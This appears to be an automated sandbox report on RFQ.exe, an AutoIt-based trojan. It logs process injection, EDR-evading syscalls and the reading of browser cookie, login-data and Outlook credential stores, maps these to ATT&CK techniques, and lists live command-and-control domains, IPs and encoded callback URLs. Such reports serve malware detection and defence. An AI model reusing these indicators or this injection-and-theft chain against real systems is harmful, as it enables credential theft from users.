                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 8040Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F3008Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006E1145
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_0068445D
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0069EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,0_2_0069EFAD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006EE273 mouse_event,0_2_006EE273
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_006E0AA6
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E15A7 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006E15A7
                Source: RFQ.exeBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd%s#comments-end#ceCALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIAL
OGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEG
                Source: RFQ.exe, aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: aSgPuBFuPS.exe, 00000002.00000002.3506712515.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000000.1724749741.0000000001940000.00000002.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3506827972.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_006A0618 cpuid 0_2_006A0618
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_006F80B3 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_006F80B3
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_006DDA16 GetUserNameW,0_2_006DDA16
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_006BBB0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_006BBB0F
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0068615E

                Stealing of Sensitive Information

                Source: Yara match File source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\net.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\net.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: RFQ.exe Binary or memory string: WIN_81
                Source: RFQ.exe Binary or memory string: WIN_XP
                Source: RFQ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: RFQ.exe Binary or memory string: WIN_XPe
                Source: RFQ.exe Binary or memory string: WIN_VISTA
                Source: RFQ.exe Binary or memory string: WIN_7
                Source: RFQ.exe Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match File source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0070112B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_0070112B
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_0070172D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0070172D
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph ID: 1554222, Sample: RFQ.exe, Start date: 12/11/2024, Architecture: WINDOWS, Score: 100

                Start: contacts www.wukong.college, www.vnxoso88.art and 16 other IPs or domains; signatures: Antivirus detection for URL or domain, Antivirus / Scanner detection for submitted sample, Multi AV Scanner detection for submitted file, 5 other signatures
                  RFQ.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                    svchost.exe (started): Maps a DLL or memory area into another process
                      aSgPuBFuPS.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                        net.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          aSgPuBFuPS.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); contacts www.pluribiz.life 209.74.64.58 (ports 49897, 49912, 49927; MULTIBAND-NEWHOPEUS, United States), ppp84k45ss7ehy8ypic5x.limelightcdn.com 23.106.59.18 (ports 50044, 80; LEASEWEB-UK-LON-11GB, United Kingdom) and 6 other IPs or domains
                          firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                RFQ.exe | 62% | ReversingLabs | Win32.Trojan.Autoitinject |
                RFQ.exe | 100% | Avira | DR/AutoIt.Gen8 |
                RFQ.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
http://www.4nk.education/gnvu/ | false | Avira URL Cloud: malware | unknown
http://www.4nk.education/gnvu/?L2m0Zn=nxCjiJTB74oIWabXQvFQY5//bWyU0Jpkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhkS61tyoqX9N8hRwttUIYDPzkdcxTjy0zd8=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: malware | unknown
http://www.evoo.website/293d/ | false | Avira URL Cloud: safe | unknown
http://www.corpseflowerwatch.org/yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: malware | unknown
http://www.vehiculargustav.click/95c0/ | false | Avira URL Cloud: safe | unknown
http://www.fiqsth.vip/0m8a/ | false | Avira URL Cloud: safe | unknown
http://www.fiqsth.vip/0m8a/?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM= | false | Avira URL Cloud: safe | unknown
http://www.wukong.college/9ezc/ | false | Avira URL Cloud: safe | unknown
http://www.bio-thymus.com/ezyn/?L2m0Zn=JlwzIZwI1xJFqouQZaQIGT5Gjbtg/srAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLN5/O1cb4M0DAqfax7N6cXJuCkbka7xORy4=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: safe | unknown
http://www.kdtzhb.top/1iqa/ | false | Avira URL Cloud: safe | unknown
http://www.astorg-group.info/vdvc/?L2m0Zn=5MdYmwdbGD0BDYmZXtqVosi+TlTx67ljMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReNcAXJ0cKe8GCCdvHCelE6JjJemFhTRqEaU=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: safe | unknown
http://www.migraine-massages.pro/ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: malware | unknown
http://www.evoo.website/293d/?JPc=NBQdBBkPWTStX&L2m0Zn=7bOTn4s4CK+jD9Jyb+vO73Pd/AR3TsBOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRY9J7LzjC0OYPsgDdyhfDZaDgEJItAmmuk4= | false | Avira URL Cloud: safe | unknown
http://www.migraine-massages.pro/ym43/ | false | Avira URL Cloud: malware | unknown
http://www.vnxoso88.art/d26j/ | false | Avira URL Cloud: safe | unknown
http://www.kdtzhb.top/1iqa/?L2m0Zn=EIYp+2qno3OyA6JS9Y7uk1QSTQ5f7vCBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhVH33IbkgUmM7v94zdg8dOLyK52Qf4FB6p0=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: safe | unknown
http://www.wukong.college/9ezc/?JPc=NBQdBBkPWTStX&L2m0Zn=xtzn0DJhGGCFi+NGW0356zy9k0R5ayLej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pe4/4DLJl/A2P/VorJYWOIYL6GivXmTWJR8= | false | Avira URL Cloud: safe | unknown
http://www.astorg-group.info/vdvc/ | false | Avira URL Cloud: safe | unknown
http://www.pluribiz.life/afcr/ | false | Avira URL Cloud: safe | unknown
http://www.bio-thymus.com/ezyn/ | false | Avira URL Cloud: safe | unknown
http://www.vnxoso88.art/d26j/?L2m0Zn=yTdTvK6nwd7fLzOcZ1KS4TBFSWEE7xEBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3l8PVEl0DEVtj8ozSBQBBAVHa7hfB74pOyU=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: safe | unknown
http://www.pluribiz.life/afcr/?L2m0Zn=pxUnB3/JQIgHT0Xo3IWq6WCCUHVXBaIMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ABar8QBPLOAn7b24mX56Fs9L7gSNzzZg1Hk=&JPc=NBQdBBkPWTStX | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://whois.gandi.net/en/results?search=4nk.education | net.exe, 00000003.00000002.3508009639.0000000004016000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003A36000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.wukong.college | aSgPuBFuPS.exe, 00000005.00000002.3508624715.0000000005957000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
